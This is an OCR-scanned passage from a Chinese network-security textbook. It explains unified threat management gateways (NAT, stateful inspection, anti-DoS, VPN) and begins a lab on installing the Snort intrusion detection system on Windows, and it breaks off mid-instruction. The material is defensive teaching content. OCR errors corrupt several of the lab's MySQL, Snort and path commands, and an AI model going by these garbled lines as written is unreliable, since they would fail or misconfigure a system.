UTM 的 其 他 特性 ,如 安全 管理 日志、 策略 管理 .QoS、 负 和 载 均衡 .HA 和 报告 带宽 管理 
等 ,这 些 特 性 通常 是 为 主要 的 安全 功能 服务 的 。 图 9-23 表示 UTM 系统 平台 上 的 综合 多 项 
功能 。 


aera € 
”防火墙 


入 侵 防 护 | 


防 病毒 


反 垃 圾 邮件 


图 9-23 UTM 系统 平台 的 综合 多 项 功能 


1. UTM 在 组 建安 全 网 络 中 的 优点 


UTM 在 组 建安 全 网 络 中 具有 如 下 优点 。 

(1) 整合 所 带 来 的 成 本 降低 。UTM 将 多 种 安全 功能 整合 在 同一 产品 当中 能 够 让 这 些 
功能 组 成 统一 的 整体 发 挥 作用 , 相 比 于 单个 功能 的 累加 功效 更 强 , 颇 有 “一 加 一 大 于 二 ”的 意 
味 。 这 样 可 以 帮助 中 小 企业 用 户 用 较 低 的 成 本 获得 更 加 全 面 的 安全 防御 。 

(2) 降低 信息 安全 工作 强度 。UTM 一 次 性 获得 多 种 产品 的 功能 , 接 在 网 络 上 就 可 以 完 
成 基本 的 安全 防御 功能 ,所 以 强度 大 大 降低 ; UTM 各 个 功能 模块 使 用 同样 的 管理 接口 ,并 
具有 内 建 的 联动 能 力 , 所 以 在 使 用 上 也 较 简 单 ; 同等 安全 需求 条 件 下 ,UTM 数量 低 于 传统 
安全 设备 ,减少 维护 工作 量 。 

(3) 降低 技术 复杂 度 。 由 于 UTM 中 装 人 了 很 多 的 功能 模块 ,所 以 为 提高 易 用 性 进行 
了 很 多 考虑 。 另 外 ,这 些 功能 的 协同 运作 无 形 中 降低 了 掌握 和 管理 各 种 安全 功能 的 难度 以 
及 用 户 误 操 作 的 可 能 。 对 于 没有 专业 信息 安全 人 员 及 技术 力量 相对 薄弱 的 组 织 来 说 ,信息 
安全 质量 也 可 有 所 保证 。 


2. UTM 在 组 建安 全 网 络 中 的 缺点 


UTM 在 组 建安 全 网 络 中 具有 如 下 缺点 。 

(1) 内 部 防御 的 弊端 。 网 关 防 御 在 防范 外 部 威胁 的 时 候 非常 有 效 , 但 面 对 内 部 威胁 无 
法 发 挥 作用 ,所 以 以 网 关 型 防御 为 主 的 UTM 不 是 解决 安全 问题 的 万 灵 药 。 内 部 防御 要 靠 
企业 加 强 管理 。 

(2) 过 度 集成 带 来 的 风险 。 将 所 有 功能 集成 在 UTM 当中 使 得 抗 风险 能 力 有 所 降低 。 
一 旦 该 UTM 设备 出 现 问题 ,将 导致 所 有 的 安全 防御 措施 失效 。UTM 的 安全 漏洞 也 会 造 
成 相当 严重 的 损失 。 
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(3) 性 能 和 稳定 性 。 尽 管 使 用 了 很 多 专门 的 软 硬 件 技术 来 提供 足够 的 性 能 ,但 是 在 同 
样 的 空间 下 实现 更 高 的 性 能 输出 还 是 会 对 系统 的 稳定 性 造成 影响 。 


3. 神州 数码 UTM 


神州 数码 DCFW-1800E-UTM. 如 图 9-24 所 示 , 集 ECSS = | 


合 了 防火 墙 \ 防 病毒 网 关 、IPS/IDS、 防 垃圾 邮件 网 关 、 
VPN .流量 整 型 网 关 、Anti-DoS 网 关 、 用 户 身 份 认证 网 
关 、 审 计 网 关 九 大 功能 为 一 体 。 采 用 专门 设计 的 硬件 平台 、 专 用 的 安全 操作 系统 、 硬 件 独立 
总 线 架构 和 病毒 检测 专用 模块 ,在 提升 功能 的 同时 保证 了 在 千 光 环境 下 的 高 性 能 。 

DCFW-1800E-UTM 内 置 4 个 10/100Mbps 自 适应 以 太 网 接口 ,适合 复杂 网 络 链 路 下 
的 接 入 需求 ,适合 于 大 型 企业 级 用 户 的 全 面 的 安全 需求 ,在 未 部 署 安全 边界 产品 的 网 络 中 提 
供 全 面 的 安全 防护 。 


9.9.2 UTM 与 传统 网 关 的 关系 


许多 用 户 认为 ,只 要 在 网 络 边界 部 署 UTM, 所 有 安全 问题 都 会 迎刃而解 ,不 必 再 购买 
其 他 单一 网 关 产品 。 其 实 不然 , 在 网 络 内 部 存在 各 种 级 别 的 安全 域 ,在 各 个 行业 内 部 存在 很 
多 特殊 的 网 络 , 出 于 多 方面 考虑 ,这 些 位 置 部 署 的 不 一 定 是 UTM 类 设备 。 下 面 介 绍 UTM 
与 各 种 传统 网 关 的 关系 。 


1. UTM 与 防火 墙 的 关系 


防火 墙 在 安全 网 关 设 备 中 的 位 置 非 常 重 要 ,主要 工作 在 OSI 参考 模型 的 网 络 层 和 传输 
层 , 能 够 实现 访问 控制 。UTM 最 为 重要 的 功能 之 一 就 是 防火 墙 ,完全 覆盖 了 独立 防火 墙 的 
功能 ,从 产品 功能 角度 看 完全 可 以 取代 防火 墙 。 但 在 实际 网 络 应 用 中 ,有 些 内 部 网 络 与 其 他 
网 络 完全 物理 隔离 ,同时 各 个 安全 域 之 间 仅 需要 访问 控制 ,不 需要 应 用 层 的 安全 防护 ; 在 不 
考虑 成 本 的 情况 下 ,这 部 分 网 络 的 安全 防护 可 以 由 UTM 防火 墙 功能 来 完成 。 所 以 从 长 远 
来 看 ,UTM 能 取代 防火 墙 。 


2. UTM 与 IPS 的 关系 


图 9-24 DCFW-1800E-UTM 


IPS 有 NIPS 和 HIPS 两 种 类 型 。NIPS 部 署 在 网 络 出 口 ,保护 目标 是 网 络 , 但 网 络 是 主 
机 服务器、 网 络 设备 的 动态 集合 ,这 个 保护 目标 不 明确 ; NIPS 实现 人 侵 防御 功能 、 部 分 防 
火 墙 功 能 、 内 容 过 滤 功 能 等 ,看 上 去 更 像 UTM 功能 的 子 集 ,所 以 UTM 涵盖 了 NIPS, 
HIPS 部 署 在 服务 器 前 ,主要 保护 Web 业务 ,保护 对 象 明确 ,要 求 也 非常 高 ,“ 精 确 阻 断 ”是 
对 HIPS 的 要 求 ,重点 针对 SQL 注入 、 跨 站 脚本 攻击 、 应 用 层 DDoS 攻击 等 威胁 。 从 部 署 位 
置 和 功能 上 看 ,UTM 与 WIPS 是 相互 补充 的 。 


3. UTM 与 防 病毒 网 关 (AV) 的 关系 


防 病毒 功能 是 UTM 最 重要 的 必 备 功能 ,从 查 毒 和 杀毒 能 力 上 看 ,采用 与 独立 防 病毒 网 
关 类 似 的 技术 ,达到 相同 效果 ; 防 病毒 对 性 能 影响 比较 大 ,通过 软件 的 优化 和 专用 硬件 平台 
的 选择 ,UTM 的 防毒 性 能 与 独立 防 病毒 网 关 的 性 能 相差 不 大 。 因 此 ,UTM 可 覆盖 和 取代 
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防 病毒 网 关 。 

总 之 ,UTM 取代 了 防火 墙 \.NIPS、AV、 反 垃圾 邮件 网 关 等 大 多 数 传统 安全 网 关 , 而 与 
HIPS 形成 了 互补 关系 。UTM 的 出 现 使 得 串联 网 关 式 的 多 种 产品 得 到 有 效 整合 ,在 网 络 边 
界 树 起 了 强大 的 立体 防线 ,用 户 不 需要 在 网 络 边 际 上 部 署 一 连 串 的 安全 设备 ,降低 了 用 户 的 
管理 成 本 。 


9.9.3 UTM 的 访问 控制 功能 


路 由 器 和 防火 墙 都 具有 对 数据 流 的 访问 控制 功能 ,通过 分 析 数 据 包 中 的 源 地 址 .目的 地 
址 、 端 口 ,协议 等 ,结合 定义 好 的 安全 策略 ,进行 拒绝 、 允 许 等 简单 控制 ,其 主要 的 分 析 信息 均 
是 网 络 层 信息 。 对 于 数据 包 中 携带 的 应 用 层 信息 无 法 进行 有 效 分 析 , 从 而 无 法 对 受 保护 的 
网 络 进行 全 面 防护 。 

UTM 作为 统一 威胁 管理 的 网 关 类 产品 ,必须 通过 其 内 部 各 种 安全 模块 的 融合 ,对 数据 
包 进行 全 面 检测 ,真正 实现 对 访问 行为 的 全 面 控制 。 

UTM 访问 控制 功能 的 实现 需要 多 方位 技术 的 支持 。 

(1) 状态 检测 技术 。UTM 为 了 提供 可 靠 的 安全 性 ,必须 跟踪 流 经 它 的 所 有 通信 信息 
为 了 控制 所 有 类 型 数据 流 ,UTM 首先 必须 获得 所 有 层次 和 与 应 用 相关 的 信息 ,然后 存储 这 
些 信息 ,还 要 能 够 重新 获得 以 及 控制 这 些 信息 。UTM 仅 检 查 独 立 的 信息 包 是 不 够 的 ,因为 
状态 信息 (以 前 的 通信 和 其 他 应 用 信息 ) 是 控制 新 的 通信 连接 的 最 基本 因素 。 对 于 某 一 通信 
连接 ,通信 状态 (以 前 的 通信 信息 ) 和 应 用 状态 (其 他 的 应 用 信息 ) 是 对 该 连接 做 控制 决定 的 
关键 因素 。 
因此 为 了 保证 高 层 的 安全 ,UTM 必须 能 够 访问 、 分 析 和 利用 以 下 几 种 信息 : 通信 信 
息 ,所 有 应 用 层 的 数据 包 的 信息 ; 四 通信 状态 ,以 前 的 通信 状态 信息 ; @ 来 自 应 用 的 状态 ， 
其 他 应 用 的 状态 信息 ; 四 信息 处 理 , 基 于 以 上 所 有 元 素 的 灵活 的 表达 式 的 估算 。 

状态 检测 技术 能 在 网 络 层 实现 所 有 需要 的 UTM 访问 控制 能 力 。UTM 的 状态 检测 模 
块 能 访问 和 分 析 从 各 层次 得 到 的 数据 ,并 存储 和 更 新 状态 数据 及 上 下 文 信息 ,为 跟踪 无 连接 
的 协议 (比如 RPC 和 基于 UDP 的 应 用 ) 提 供 虚 拟 的 会 话 信息 。UTM 根据 从 传输 过 程 和 应 
用 状态 所 获得 的 数据 ,以 及 网 络 设置 和 安全 规则 产生 一 个 合适 的 操作 ,或 者 拒绝 或 者 允许 、 
或 者 加 密 传输 。 

(2) NAT 技术 。NAT 就 是 用 一 个 IP 地 址 代替 另 一 个 瑟 地 址 ,设计 NAT 的 目的 是 增 
加 专用 网 络 中 可 使 用 的 TP 地 址 数 , 并 且 它 有 一 个 隐藏 的 安全 特性 ,如 内 部 主机 隐藏 等 ,保证 
网 络 的 一 定安 全 。 

NAT 主要 用 在 两 个 方面 。@ 网 络 管 理 员 希 望 隐藏 内 部 网 络 的 IP 地 址 。 这 样 , 互 联网 
上 的 主机 无 法 判断 内 部 网 络 的 情况 。 加 内 部 网 络 的 IP 地 址 是 无 效 的 。IP 地 址 不 够 用 , 申 
请 足够 多 的 合法 TP 地 址 很 难 ,因此 需要 转换 IP 地 址 。 上 述 两 种 情况 : 内 部 网 对 外 面 不 可 
见 , 互 联网 不 能 访问 内 部 网 ,内 部 网 主机 之 间 可 以 相互 访问 。UTM 网 关 可 以 部 分 解决 这 个 
问题 ,但 通过 网 关 的 形式 会 带 来 很 大 开销 ,所 以 可 以 用 到 NAT 技术 。NAT 提供 一 种 透明 
的 完善 的 解决 方案 ,网 管 员 可 以 决定 哪些 内 部 的 IP 地 址 需要 隐藏 ,哪些 地 址 需要 映像 为 一 
个 对 互联 网 可 见 的 IP 地址 。NAT 可 以 实现 一 种 “ 单 向 路 由 ”, 这 样 就 不 存在 从 互联 网 到 内 
部 网 或 主机 的 路 由 。 
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NAT 工作 机 制 : 当 网 络 数据 包 流入 UTM 时 ,系统 会 检查 该 数据 包 是 否 符合 用 户 设 定 
的 NAT 规则 ,如 果 找 到 符合 的 规则 ,系统 会 按照 规则 对 数据 包 进行 转换 , 同时 建立 一 个 
NAT 进程 ; 当 有 数据 包 返 回 时 ,将 检查 进程 表 , 进 行 相应 的 处 理 。 这 里 可 以 看 到 ,NAT 需 
要 对 每 一 个 TCP/IP 连接 建立 一 个 对 应 的 NAT 进程 表 项 ,假如 不 对 查询 算法 进行 优化 , 则 
在 访问 量 大 的 情况 下 ,查询 NAT 进程 表 项 将 会 占用 大 量 的 CPU 时 间 。 

在 NAT 图 (如 图 9-25 所 示 ) 中 的 10.0.0. 1 主机 处 于 内 部 网 ,网 关 为 UTM 内 部 接口 
10.0.0.2,UTM 外 网 接口 IP 地 址 是 202. 112. 108. 1, 互 联网 上 有 一 台 服 务 器 的 IP 地 址 是 
202. 100. 10. 50。 用 户 机 10. 0. 0. 1 通过 UTM 的 NAT 才能 访问 服务 器 202. 100. 10. 50。 
下 面 介绍 NAT 的 过 程 。 
防火 墙 


-— 


Q - 
公共 服务 器 
外 部 — T 
接口 202.100.10.50 
| 202.112.108.1 
@ @ 
图 9-25 UTM 网 络 地 址 转换 过 程 


客户 机 


不 同 网 段 IP 地 址 的 转换 情况 如 表 9-7 所 示 , 内 部 地 址 是 10. 0. 0.0 子 网 ,UTM 网 关 对 
外 部 的 地 址 是 202. 112. 108. 1 ,可 以 将 内 部 网 的 地 址 都 转换 成 202. 112. 108. 1。 但 这 会 遇 到 
一 个 问题 ,所 有 返回 数据 包 的 目的 JP 都 是 202.112. 108. 1 ,那么 UTM 如 何 识别 它们 并 送 回 
内 部 网 的 真实 主机 呢 ? UTM 记 住 所 有 出 去 的 包 , 每 个 包 有 一 个 目的 端口 ,每 台 主机 的 端口 
不 一 样 ; UTM 记 住 所 有 出 去 的 包 的 TCP 序列 号 ,不 同 主机 发 送 的 包 的 序列 号 不 一 样 ; 
UTM 根据 记录 把 返回 的 数据 包 送 达 正 确 的 发 送 主机 。 


表 9-7 不 同 网 段 IP 地 址 的 转换 


过 程 目的 IP 
0 10.0.0.1 10.0.0.2 
Q 202.112. 108. 1 202. 100. 10. 50 
(©) 202. 100. 10. 50 202. 112. 108. 1 
@ 202. 100. 10.50 10.0.0.1 


UTM 通过 灵活 地 应 用 NAT 功能 ,在 对 通过 UTM 的 数据 进行 全 面 细致 检测 的 同时 ， 
还 保证 了 网 络 的 连通 性 , 极 大 地 提高 了 企业 网 络 资源 的 应 用 。 

(3) 防 拒绝 服务 攻击 技术 。 互 联网 络 诞生 以 来 ,DoS 攻击 互联 网 络 就 一 直 存在 ,给 网 络 
带 来 重大 的 威胁 ,目前 DoS 攻击 从 技术 上 还 没有 根本 的 解决 办 法 。 该 如 何 应 对 随时 出 现 的 
DoS 攻击 呢 ? 首先 分 析 一 下 DoS 攻击 的 原因 。 

O 软件 弱点 是 包含 在 操作 系统 或 应 用 程序 中 与 安全 相关 的 系统 缺陷 ,这 些 缺 陷 大 多 是 
由 于 错误 的 程序 编制 .粗心 的 源 代 码 审核 .无心 的 负 效应 或 一 些 不 适当 的 绑 定 所 造成 的 。 由 
于 使 用 的 软件 几乎 完全 依赖 于 开发 商 ,对 于 由 软件 引起 的 漏洞 只 能 依靠 安装 Hotfixes, 
ServicePackets 补丁 。 
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O 错误 配置 也 会 成 为 系统 的 安全 隐患 。 这 些 错误 配置 通常 发 生 在 路 由 器 防火墙 , 交 
换 机 以 及 其 他 网 络 连 接 设备 .系统 或 者 应 用 程序 中 ,大 多 是 由 于 一 些 没 经 验 的 ,无 责任 员工 
或 者 错误 的 理论 所 导致 的 。 因 此 这 种 漏洞 应 当 请 教 专业 的 技术 人 员 来 修正 。 

O 重复 请 求 导致 过 载 的 拒绝 服务 攻击 。 当 对 资源 的 重复 请 求 大 大 超过 资源 的 支付 能 
力 时 就 会 造成 拒绝 服务 攻击 (例如 ,对 已 经 满载 
的 Web 服务 器 进行 过 多 的 请 求 使 其 过 载 )。 

为 避免 系统 免 受 DoS 恶意 攻击 ,需要 安装 | Oae Deme Drw sema 
UTM. UTM 一 般配 置 在 网 关 的 位 置 ,比较 容易 |o meten t erm 
33: Dos 攻击 ,通过 调用 内 部 的 防 Dos 模块 ,如 | De l 

[e esos RS (300 (10-1000) 
IH 9-26 所 示 ,抵御 了 Dos 攻击 ,保障 了 网 络 的 正 |o amem seem 


常 运 行 。 
9.9.4 UTM 的 入 侵 防 御 功 能 


UTM 和 IPS 是 同时 出 现 的 两 种 设备 。UTM 的 入 侵 防 御 功 能 与 专门 的 入 侵 防御 之 间 
是 什么 关系 呢 ? 


防 DoS 攻 击 


图 9-26 UTM 防 DoS 攻击 配置 


1. 从 位 置 看 区 别 


UTM 通常 部 署 在 网 络 出 口 位 置 ,主要 防御 木马 蠕虫 .网 络 滥用 及 针对 操作 系统 底层 
的 溢出 攻击 。 专 业 的 IPS 通常 部 署 在 服务 器 前 ,保护 Web 业务 、 数 据 库 业务 等 ,重点 针对 
SQL 注入 、 跨 站 脚本 攻击 、 应 用 层 DDoS 攻击 等 威胁 。 从 部 署 位 置 看 ,UTM 的 入 侵 防 御 功 
能 与 专业 的 IPS 是 相互 补充 的 。 


2， 从 保护 对 象 看 区 别 


UTM 部 署 在 网 络 出 口 位 置 , 保 护 目标 是 网 络 ,网 络 是 主机 、 服 务 器 、 网 络 设备 的 动态 
集合 ,保护 目标 并 不 明确 ,因此 其 入 侵 防 御 功能 面向 系统 安全 及 连接 安全 。 专 业 的 IPS 
署 在 服务 器 前 ,保护 Web 业务 ,数据库 业务 等 ,保护 对 象 非常 明确 ,因此 主要 面向 业务 
安全 。 


3. 从 发 展 趋势 看 区 别 


对 于 UTM, 业 界 有 了 公认 的 定义 ,而 IPS 的 定义 很 不 统一 。 部 分 设备 商 的 IPS 实际 上 
更 接近 于 UTM, 具 备 信 侵 防御 、 防 火 墙 VPN, 防 病毒 等 功能 ,这 部 分 IPS 会 融合 到 UTM 
市 场 。 而 另外 一 些 技术 实力 领先 的 厂商 ,致力 于 专业 化 的 IPS. RE Web 业务 安全 ,与 
UTM 的 入 侵 防 御 功能 有 明显 区 别 。 


9.9.5 UTM 的 虚拟 专用 网 功能 
1. 传统 VPN 网 关 的 缺陷 


传统 的 IPSec VPN 网 关 构 建 企业 的 VPN 系统 有 几 个 固有 的 缺陷 。 
(1) 没有 网 关 防 病毒 功能 。 各 类 蠕虫 和 网 络 病毒 可 以 从 漫游 PC/ 分 支 机 构 / 合 作 伙伴 
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网 络 等 位 置 通过 VPN 隧道 传播 至 内 网 。 
(2) 没有 入 侵 防 御 功能 。 黑 客 可 从 分 支 机 构 / 合 作 伙伴 网 络 中 通过 VPN 隧道 发 起 


攻击 。 
(3) 采用 IPSec VPN 实现 漫游 用 户 接 人 。IPSec VPN 的 漫游 PC 到 VPN 网 关 接 人 采 
用 C/S 架构 的 VPN 客户 端 ,缺乏 灵活 性 ; VPN 客户 端 存在 与 操作 系统 或 其 他 应 用 软件 不 
XU. 

(4) 维护 成 本 高 。 客 户 端 配置 相对 复杂 , 随 着 VPN 终端 数 的 增长 , 运 维 成 本 线性 递增 。 

可 见 , 传 统 的 VPN 满足 了 用 户 对 于 VPN 业务 的 基本 需求 , 即 解决 用 户 的 连通 性 ,数据 
级 别 的 安全 性 和 认证 问题 ,而 对 于 接 入 VPN 的 分 支 节点 /漫游 用 户 在 应 用 级 别 的 安全 性 上 
没有 考虑 。 

但 是 ,如 果 单纯 采用 其 他 设备 弥补 上 述 安全 缺陷 又 不 是 那么 容易 。VPN 隧道 中 的 所 有 
数据 本 身 经 过 了 严格 加 密 , 如 果 直 接 在 VPN 传送 的 路 径 上 部 署 IPS AV 等 应 用 层 安全 设 
备 , 无 法 将 数据 从 报 文中 解密 ,因此 无 法 起 到 应 有 作用 。 如 果 在 VPN 网 关 之 后 县 加 部 署 多 
个 安全 设备 ,会 增加 用 户 的 维护 压力 ,提高 整体 的 建设 成 本 。 

有 没有 一 种 VPN 方案 能 够 让 用 户 解 决 上 述 安全 性 ,维护 成 本 和 采购 成 本 方面 的 问题 
呢 ? 答案 是 肯定 的 , 那 就 是 采用 UTM 设备 构建 企业 的 VPN 体系 。 


2. 采用 UTM 构建 VPN 


随 着 VPN 技术 的 逐步 成 熟 ,VPN 模块 已 经 成 为 各 种 网 关 产 品 的 标准 配置 。 作 为 安全 
网 关 功 能 集大成 者 的 UTM 自然 也 不 能 例外 ,作为 传统 安全 网 关 的 终结 者 ,UTM 产品 的 
VPN 功能 比 传统 的 IPSec VPN 网 关 、 防 火 墙 或 路 由 器 有 了 较 大 的 增强 。 采 用 UTM 构建 
VPN 体系 的 优势 主要 如 下 。 

(D UTM 支持 对 VPN 隧道 内 数据 进行 病毒 过 滤 及 人 侵 防御 。UTM 作为 VPN 网 关 ， 
本 身 就 要 负责 数据 的 加 密 /解密 工作 ,因此 ,如 果 采 用 UTM 作为 VPN 网 关 设备 ,就 可 以 实 
现 对 VPN 隧道 中 数据 的 应 用 层 扫描 ,并 在 这 个 基础 上 实现 病毒 过 滤 、 入 侵 防 御 及 其 他 应 用 
层 安全 功能 。 

(2) UTM 同时 支持 IPSec VPN 和 SSL VPN。IPSec VPN 在 使 用 及 部 署 中 存在 一 些 
固有 的 体系 问题 ,比如 需要 客户 端 软 件 ,维护 压力 大 ,存在 穿越 NAT/ 防 火 墙 问题 ,存在 系统 
兼容 性 问题 等 。 而 这 些 问 题 恰好 是 SSL VPN 可 以 很 好 解决 的 问题 。 

(3) SSL VPN 最 开始 是 作为 单独 的 网 关 形 态 出 现 , 但 人 们 很 快 发 现 , 如 果 将 SSL VPN 
5 UTM 设备 结合 起 来 ,会 给 用 户 带 来 比 单纯 的 SSL VPN 网 关 更 大 的 客户 价值 (主要 体现 
在 应 用 层 安 全 上 )。 因 此 ,SSL VPN 已 成 为 UTM 产品 的 标准 功能 模块 。 


JE 


1. 什么 是 入 侵 检测 系统 ? 
2. 人 入侵 检测 系统 有 哪些 类 型 ? 
3. 人 侵 检测 系统 有 什么 缺陷 ? 
4. 什么 是 人 侵 防御 系统 ? 
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. 人 侵 防御 系统 有 哪些 类 型 ? 

- 人 侵 防御 系统 有 什么 缺陷 ? 

- 人 侵 检测 系统 与 人 侵 防 御 系 统 有 哪些 异同 ? 
- 什么 是 统一 威胁 管理 ? 

. 统一 威胁 管理 与 传统 安全 设备 的 关系 ? 


o oo D O0 c 


& 9.1 Snort 系统 的 配置 和 应 用 


Snort 是 美国 Sourcefire 公司 开发 的 发 布 在 GPL v2 下 的 IDS 软件 ,有 三 种 工作 模式 : 
嗅 探 器 ,数据 包 记录 器 、 网 络 人 侵 检测 。 嗅 探 器 模式 仅仅 是 从 网 络 上 读 取 数 据 包 并 作为 连续 
不 断 的 流 显示 在 终端 上 。 数 据 包 记录 器 模式 把 数据 包 记 录 到 硬盘 上 。 网 络 人 侵 检测 模式 分 
析 网 络 数据 流 以 匹配 用 户 定义 的 一 些 规则 ,并 根据 检测 结果 采取 一 定 的 动作 。NIDS 模式 
是 最 复杂 的 ,而 且 是 可 配置 的 。Snort 除 可 以 用 来 监测 各 种 数据 包 如 端口 扫描 等 之 外 ,还 提 
供 了 以 XML 形式 或 数据 库 形式 记录 日 志 的 各 种 插件 。 

【 实 训 目 的 】 

CD 通过 实验 深入 理解 入侵 检 测 系统 的 原理 和 工作 方式 。 

(2) 熟悉 人 侵 检测 工具 Snort 在 Windows 操作 系统 中 的 安装 和 配置 方法 。 

【 实 训 环境 】 

实验 室 所 有 机 器 安装 了 Windows 2003 操作 系统 ,并 附带 Apache, Php, Mysql, Snort, 
adodb acid, jpgraph, winpcap 等 软件 的 安装 包 。 

【 实 训 内 容 】 

1. 安装 Apache 

选择 定制 安装 ,安装 路 径 修改 为 c:\apache, 这 样 与 后 面 的 参数 设置 保持 一 致 。 

在 命令 行 窗口 输入 下 面 的 命令 ,启动 Apache 服务 : 


net start apache2 


2. 安装 PHP 


解压 缩 php-4. 3. 2-Win32. zip 至 c:\php。 

复制 php4ts. dll Æ C:\WINDOWS\system32。 
复制 php. ini-dist € C:\WINDOWS\php. ini, 
修改 php. ini: 


extension- php gd2.dll 


复制 c: NphpVextensionV php. gd2. dll C:\WINDOWS\ GE: 以 上 添加 gd 图 形 库 支 持 ) 。 
在 httpd. conf 中 添加 : 


LoadModule php4 module "c: /php/sapi/php4apache2. d11" 
AddType application/x- httpd - php. php 


ST 网 络 安全 技术 
在 c:Napache2\htdocs 目录 下 新 建 test. php 文件 ,test. php 文件 的 内 容 为 <? phpinfoO? 7 。 
打开 浏览 器 ,输入 http://127.0. 0. 1/test, php, Wit PHP 是 否 安装 成 功 。 
安装 成 功 后 的 页 面 如 图 9-27 所 示 。 


9-27 PHP 运行 页 面 


3. 安装 配置 Mysql 数据 库 
默认 安装 到 c; mysql ,新建 my. ini 并 复制 到 C:\ WINDOWS\ 下 ,其 中 my. ini 的 内 
RH: 


[mysqld] 

basedir = c: \mysql 
bind-address = 127. 0. 0. 1 
datadir = c: \mysql\data 


启动 Mysal 服务 ,在 命令 行 窗口 执行 命令 : 


mysqld - install 
net start mysql 


配置 root H1. 


c: V» cd nysglVbin 
c: Mysql Vbin? mysql 
mysql > set password for "root"(Q"localhost" = password('newPWD'); 


注意 : 这 里 newPWD 为 用 户 自己 设置 的 密码 。 
以 root 身份 登录 : 


Mysql -u root- p 
4. 安装 Snort 


默认 安装 到 c:\snort 下 ,然后 在 命令 行 窗口 输入 下 面 的 命令 ,建立 Snort 运行 必需 的 
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snort 库 和 snort_archive JẸ: 


mysql? create database snort; 
mysql? create database snort archive; 


下 一 步 在 命令 行使 用 c:\snort\contrib 目录 下 create mysql 脚本 建立 Snort 运行 必需 
的 数据 表 : 


c:\mysql\bin\mysql -D snort -u root ~-p<c:\snort\contrib\create mysql; 
c:\mysql\bin\mysql - D snort archive -u root -p< 
c:\snort\contrib\create_mysql; 


在 命令 行 窗口 建立 acid 和 snort 用 户 ,或 者 采用 phpmyadmin 进行 操作 : 


mysql? grant usage on * . * to "acid"(Q"localhost" identified by "acidpassword"; 
mysql? grant usage on # . * to "snort"(G"localhost" identified by "snortpassword" ; 


然后 为 acid 用 户 和 snort 用 户 分 配 相关 权限 


mysql > grant select, insert, update, delete,create,alter on snort . « to "acid" @"localhost"; 
mysql» grant select, insert on snort . « to "snort"(dà "localhost"; 

mysql > grantselect, insert, update, delete, create, alter on snort archive . * to "acid" @" 
localhost"; 


这 一 步 也 可 以 采用 phpmyadmin 进行 操作 。 
5. 安装 配置 adodb ,acid 


解压 缩 adodb360. zip 至 c:\php\adodb 目录 下 ,解压 缩 acid-0. 9. 6b23. tar. gz 至 ci 
apache2\htdocs\acid 目录 下 。 
修改 acid. conf. php 文件 : 


$ DBlib path = "c:VphpVadodb" ; 


$alert dbname = "snort"; 
$alert host - "localhost"; 
$alert port = ""; 

$alert user = "acid"; 


$alert password = "acidpassword"; 

/ * Archive DB connection parameters * / 
$archive dbname - "snort archive"; 
$archive host - "localhost"; 
$archive port = ""; 


$archive user = "acid"; 
$archive password = " acidpassword "; 
$ ChartLib path = "c:Vphp V jpgraphVsrc" ; 


打开 浏览 器 ,输入 http: //127.0. 0. 1/acid/acid db setup. php ,按照 系统 提示 建立 acid 
运行 必需 的 数据 库 。 


6. 安装 jpgraph Æ 


解压 缩 jpgraph-1. 12. 2. tar. gz Æ c:\php\ jpgraph。 


SA 网 络 安全 技术 


修改 jpgraph. php: 


DEFINE("CACHE DIR","/tnp/jpgraph cache/") (取消 原来 的 注释 ) 
7. 安装 winpcap 
8. 配置 Snort 


编辑 c:\snort\etc\snort. conf ,需要 修改 的 地 方 包括 : 


include classification. config 
include reference. config 


改 为 绝对 路 径 ， 


include c:VsnortVeteVclassification. config 
include c: VsnortVeteVreference. conf ig 


设置 snort 输出 alert 到 mysql server; 


output database: alert, mysql, host = localhost user = snort password = snort dbname = snort 


9. 测试 Snort 
输入 命令 ,运行 snort; 
c:\snort\bin> snort - c "c:\snort\etc\snort. conf" - 1 "c:\snort\log" - vdeX 


其 中 ， 

-X 参数 用 于 在 数据 链接 层 记 录 raw packet 数据 ; 
-d 参数 用 于 记录 应 用 层 的 数据 ; 

-e 参数 用 于 显示 /记录 第 二 层 报 文 头 数据 ; 

-c 参数 用 于 指定 snort 的 配置 文件 的 路 径 ; 

-v 参数 用 于 在 屏幕 上 显示 被 抓 到 的 包 。 

启动 Apache 和 mysql 服务 : 


net start apache2 
mysqld - install 
net start mysql 


运行 acid: 打开 浏览 器 ,地 址 为 http: //127. 0. 0. 1/acid。 如 图 9-28 所 示 , 则 表示 acid 
安装 成 功 。 

在 命令 行 运行 Snort, 输 入 命令 : 

c:\snort\bin\snort - c "c:\snort\etc\snort. conf" - 1 "c:\snort\log" - de 

如 果 Snort 正常 运行 ,如 图 9-29 所 示 。 

10. 开始 检测 


首先 配置 snort. conf 文件 ,将 var HOME_NET any 语句 中 的 any 改 为 自己 所 在 的 子 
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地 址 [i] http://127.0.0.1/acd/acd_man.php «B£*ess x^Ep 


Databases 


Analysis Console for | 


Added D alert(s) to the Alert cache 


Queried on : Mon September 26, 2005 11:11:12 
Database: snori@localhost (schema version: 106) 


Time window: no alerts detected 
Sensors: 0 Traffic Profile by Protocol 
Unique Alerts:0 ( 0 categories ) TCP 9*3) 
Total Number of Alerts: 0 
JOP Q^ 
© Source IP addresses: 0 porem 
* Dest. IP addresses: 0 n 
* Unique IP links 0 ICMP Qs) 
* Source Ports: 0 
o TCP (0) UDP (0) Portscan Trafic 0%) 
* Dest. Ports: 0 
o TCP (0) UDP (0) 
* Search 
© Graphic Alert Data 
* Snapshot 
© Most recent Alerts: any protocol, TCP, UDP, ICMP © Most frequent 5 Alerts 
e Today's: alerts unique, listing; IP src / dst 
Last 24 Hours: alerts unique, listing; IP src / dst © Most Frequent Source Ports: any , TCP ,UDP 
e Last 72 Hours: alerts unique, listing; IP src / dst 。 Most Frequent Destination Ports: any , TCP , UDP 
© Most recent 15 Unique Alerts 


图 9-28 acid 安装 成 功 


sholding-locall— 
type-Both 


gen-id-i sig-id-2496 type-Both tracking-dst count-28 seconds 
EA sig-id=2495 type=Both tracking=dst count-28 seconds 
A sig-id=2523 type=Both tracking=dst count=19 
hoia sig-id=2275 type=Threshold tracking=dst count=5 
sa 


Rule application order: -)activation-)dynamic-)alert->pa: 


== Initialization Complete == 


ODBC-MySQL-FlexRESP-WIN32 (Build 38) 
hêsourcefire.con, wwu.snort .org) 
hael Davis (nike@datanerds .net, www.dataner 
1.8 - 2.x WIN32 Port By Chris Reid (chris.reid&codecraftco 


图 9-29. Snort 运行 结果 


网 地 址 ,即将 Snort 监测 的 内 网 设置 为 本 机 所 在 局 域 网 。 接 下 来 ,设置 snort. conf 文件 中 的 
